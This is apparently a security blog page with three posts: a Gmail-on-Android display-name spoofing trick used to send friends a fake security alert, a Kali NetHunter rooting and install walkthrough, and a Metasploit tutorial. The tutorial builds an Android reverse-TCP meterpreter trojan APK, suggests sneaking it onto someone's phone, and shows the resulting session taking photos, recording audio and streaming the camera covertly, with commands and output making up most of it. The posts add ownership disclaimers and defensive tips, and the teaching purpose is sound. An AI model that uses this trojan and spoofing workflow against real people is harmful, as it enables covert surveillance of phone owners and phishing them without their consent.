Sunday Round up for this week - Remember - please contact me if you would like to be featured on security-sleuth.comRead More
Yan Zhu recently discovered a vulnerability in the Android version of Gmail. Google has rejected her claims and that this issue isn’t a vulnerability. The whole scenario is quite easy to replicate and takes almost no technical knowhow besides being able to send an email.
So I decided to replicate it and prank my friends.
Change your display name in Gmail make sure you put it in the following format “”firstname.lastname@example.org” The extra quotation mark is what triggers the vulnerability, here’s the screen of the config I used for this example:
Next you just have to send a mail with to your desired targets.
When they open their Gmail on their android device and go to their inbox the contents should look like the below (the mail looks like a legitimate security alert):
The mail looks like, now once they click the link they will be in for a surprise:
They will see this image and GIF when they click the link:
Hope you enjoyed this one it was fun and easy to put together. As always please let me know if found this article useful or if you didn't, Don’t forget to like this post or leave a comment below to let me know another area you would be interested in reading about. Thanks for your continued support! Until next time!
For those of you who have read a few of my previous posts may have noticed I use Kali Linux a lot, there’s a good reason for that its easily one of the most versatile and comprehensive Linux Distro’s available out there. Recently offensive security the group behind Kali Linux have release Kali Nethunter which is basically Kali Linux packed into an Android smartphone or tablet.
If anybody has seen or heard of the game Watch_dogs Kali Nethunter is like Aiden Pearce’s smartphone. For those of you who haven’t heard of Watch_dogs the premise is this: Aiden Peirce a notorious hacker roams around Chicago hacking a smart city with nothing but his smartphone. Kali Nethunter is pretty much the closest thing available to Aiden’s phone.
I recently went about installing Kali Nethunter on a LG Nexus 5 this post documents what did and what didn’t work in regards to getting it up and running. I hope you find this useful and it may save you a couple hours in future when it comes to rooting your own phone or installing Kali Nethunter. Once again I remind you make sure you never carryout any of these activities on devices that don’t belong to you or that you don’t have permission to be working on. Kali Nethunter is a powerful tool use it wisely.
What you will need
- A PC running Windows, Mac OSX or Linux
- A Kali Compatible device (I used a Google Nexus 5) the list of compatible devices is here
Installing it (the way that didn't work)
First you will need to prepare your phone which you can find the steps for in the prep link above in short it involved enabling developer mode on your phone and disabling storage MTP
After that the fun begins you will need to install nexus tools to be able configure your phone via the terminal
bash: install.sh: command not found root@kali:~# bash <(curl -s https://raw.githubusercontent.com/corbindavenport/nexus-tools/master/install.sh) [INFO] Nexus Tools 2.6.3 [INFO] Please enter sudo password for install. [ OK ] Sudo access granted. [INFO] Downloading ADB for Linux [Intel CPU] [INFO] Success. [INFO] Downloading Fastboot for Linux [Intel CPU] [INFO] Success. [INFO] Downloading udev list [INFO] Success. [INFO] Fix permissions [ OK ] Fixed. [INFO] Fix ownership [ OK ] Fixed. [INFO] Making ADB and Fastboot executable [INFO] ADB OK. [INFO] Fastboot OK. [ OK ] Done, type adb or fastboot to run!
After that to check adb is working run the following command (your device should be visible)
root@kali:~# adb devices * daemon not running. starting it now on port 5037 * * daemon started successfully * List of devices attached sleuthdevice00001 unauthorized
After this you will want to download the files listed in the LS command below (these are available on the Kali install website)
root@kali:~# ls CF-Auto-Root-hammerhead-hammerhead-nexus5.zip Desktop kali_linux_nethunter_1.21_hammerhead_lolipop.zip openrecovery-twrp-220.127.116.11-hammerhead.img
Now to unlock and root your phone you will need to run the following commands in the exact sequence as they are below:
root@kali:~# adb reboot bootloader root@kali:~# fastboot oem unlock OKAY [ 18.770s] finished. total time: 18.771s root@kali:~# fastboot flash recovery openrecovery-twrp-18.104.22.168-hammerhead.img sending 'recovery' (14000 KB) OKAY [ 0.653s] writing 'recovery' OKAY [ 1.080s] finished. total time: 1.733s root@kali:~# chmod 755 root-linux.sh root@kali:~# ./root-linux.sh ----- CF-Auto-Root-hammerhead-hammerhead-nexus5 ----- Please make sure your device is in bootloader/fastboot mode before continuing. ***WARNING*** ALL YOUR DATA *MAY* BE WIPED ! ***WARNING*** We are going to run the OEM UNLOCK command on your device. If your device was not previously unlocked, this will wipe all your data ! After the unlock, CF-Auto-Root will boot. You should see a big red Android on your device's screen. You may need to enter your administrator password to continue. Press Ctrl+C to cancel ! Press ENTER to continue FAILED (remote: Already Unlocked) downloading 'boot.img' OKAY booting OKAY It may take a minute or so for the red Android to appear. If it doesn't show up at all, there may be a problem. Press ENTER to continue root@kali:~# adb devices List of devices attached sleuthdevice00001 device
After this my phone got stuck in a boot loop with the twrp logo flashing on the screen before rebooting
So what next? After re-running the install process under Linux a few times and seeing no change I tried with windows, I was able to progress a little further but after installing Nethunter the phone kept crashing after trying to do something simple like unlocking the phone or trying to open the menu, the phone was once again rendered unusable at this point.
Installing it (the way that works)
I then tried using the Kali Nethunter Windows Installer. Which was by far the easier and simplest of the three install processes I tried. You simply install the tool and follow the prompts it downloads all the necessary files and installs them. At the end I had a fully functioning Kali Nethunter device!
Stuff you can do with it
Here’s a small list of some of the thing Nethunter can do:
- You can use it to boot into ISO images on a PC with Drive Droid
- You can run Metasploit on it!
- Offensive security have precompiled a number of handy penetration testing tools and attacks, you can see them in action on the Kali Website.
- You can use it as a webserver!
- You can use VNC and keyboard features to control PC’s.
- Perform NFC attacks
- Monitor /capture / sniff Wi-Fi traffic
I have also included a slideshow of browsing through some of the functionality:
Please let me know if found this article useful or if you didn't, Don’t forget to like this post or leave a comment below to let me know another area you would be interested in reading about. As always thanks for your continued support! Until next time!
In the interest of full disclosure this article technically should be called “things you can do on android with meterpreter”
So I found myself with some free time this weekend, so I decided I would put together a quick post on using one of the most widely used penetration testing frameworks, Metasploit. A few months ago I started looking into Metasploit and began teaching myself the basics, what struck me most from my initial observations and tinkering with Metasploit is how incredibly easy it was to use, which is great for Security professionals who are starting out or just people who are interested in the field.
Often we read about security breaches and cybercrime in the news, in 99.95% of the articles on these topics take a high level approach (there are a wide range of reasons for why articles take this approach which I won’t delve into, but feel free to leave a comment on why you think this happens) unfortunately this makes it hard for IT Pros to figure out exactly what happened and how they can defend against these threats, fortunately tools like Metasploit help to bridge the knowledge gap and are leading us on the way to being a little more secure.
So what is Metasploit?
As I briefly glossed over earlier Metasploit is a popular penetration testing framework and penetration testing toolkit, so what does that mean you may ask? In a nutshell Metasploit is a powerful tool which has thousands of prebuilt exploits (programs which can take advantage of security vulnerabilities to give you access to or control over a machine which you would not normally have control over). Metasploit also gives you the ability to write your own exploits for security vulnerabilities and execute them against machines.
For those of you who aren’t Technical and don’t really understand what the above paragraph means I’ll summarise it this way: Metasploit is a tool which you can use to hack Computers, tablets, phones and other devices.
So without further ado ill jump right in to explaining what you can do with Metasploit on an Android Phone.
What I used
For This post I used the following devices and tools:
- A (non-rooted) Samsung Galaxy S3 with a 4GB microSD card connected to my wireless network
- An 8GB SanDisk Bootable Flash drive with Kali Linux installed (Metasploit is installed by default on Kali Linux)
- A PC with a Wireless card connected to my wireless network.
As a quick reminder I owned all of the devices used in this example. If you were to replicate this example with devices you do not own it may be a criminal offence.
This should be fairly straight forward:
- Ensure that the android phone is connected to a local area network and make sure you know its IP address.
- Plug your bootable flash drive into a PC which is powered off and power it on (you may need to make sure that your PC checks for bootable media before booting off the hard disk.
- Once the PC has booted into Kali Linux make sure it’s connected to the same local area network as the Android device.
A Quick note here this example carries out this activity on a single network and this example can be modified to work across multiple networks.
So how do you get an meterpreter session on and android device?
This by far the part where you can be most creative, the resource links show a few creative ways to do this using multiple Metasploit exploits. I don't want to give to much away so the method I used was to sneak it onto somebody’s phone by uploading it to a microSD card and install it while you have physical access to their phone, you could however hire Ninjas to take care of this for you.
The method I chose (for simplicity)
For simplicities sake I chose option 5, here’s how I carried it out:
First you have to create a backdoor “Trojan App” to exploit android you can do this by running the following command at the terminal:
root@kali:~# sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.21 lport=4444 R > app.apk
The LHOST address will be the attackers IP address (your Kali Linux machines IP).
Next I copied the file onto a microSD card and installed it (note here that you have to have install from unknown sources enabled)
Now on my PC booted up with Kali Linux I ran the following commands:
Use the multi-handler exploit:
msf > use exploit/multi/handler
Set the reverse TCP android payload:
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
Set the local and remote hosts:
msf exploit(handler) > set lhost 192.168.0.21
lhost => 192.168.0.21
msf exploit(handler) > set rhost 192.168.0.17
rhost => 192.168.0.17
Set the local port:
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.0.21:4444
[*] Starting the payload handler...
[*] Sending stage (40248 bytes) to 192.168.0.28
[*] Meterpreter session 1 opened (192.168.0.21:4444 -> 192.168.0.28:59439) at 2014-08-03 17:54:17 +0000
Now that you have a session open make sure the user clicks on the app called MainActivity and then you can begin with meterpreter.
Creepy / cool things you can do with your meterpreter session
So after you have an meterpreter session open you basically have free reign to do whatever you like on the device so ill show some of the most creepy / cool examples:
View running processes
I often start by printing the working directory:
meterpreter > ps
Printing the Working directory
I often start by printing the working directory:
meterpreter > pwd
Search for a file
Run the “search” command:
meterpreter > search –f *.mp3
No files matching your search were found.
Take photos using the devices cameras
First list all the webcams that are available:
meterpreter > webcam_list
1: Back Camera
2: Front Camera
You can now run the webcam_snap command, by default it takes a photo using the first camera:
meterpreter > webcam_snap
[+] Got frame
Webcam shot saved to: /root/liRDOzXS.jpeg
If you want to take a photo using the second camera
meterpreter > webcam_snap –I 2
[+] Got frame
Webcam shot saved to: /root/oFsDkLjd.jpeg
The command output will usually tell you what the file has been saved as
Record sound with the microphone
Run the record_mic command:
meterpreter > record_mic 5
Audio saved to: /root/JxltdUyn.wav
I didn't have much luck with this one it seemed to produce files that were not playable, but that could be something to do with the PC I was using.
Viewing a video stream from the devices camera
Run the following command to stream from the second camera:
meterpreter > webcam_stream –I 2
[*] Preparing player…
[*] Opening player at: LCInGfYj.html
How you can protect against this
- Only install apps and software from the google play store.
- Run some sort of (trusted) 3rd party security software and regularly audit your phone.
- Make sure you don’t have enable installs from unknown sources enabled.
- Keep your phone in your possession at all times.
- Avoid opening any suspicious links in emails or text messages.
Please let me know if found this article useful or if you didn't, leave a comment below to let me know another area you would be interested in reading posts about.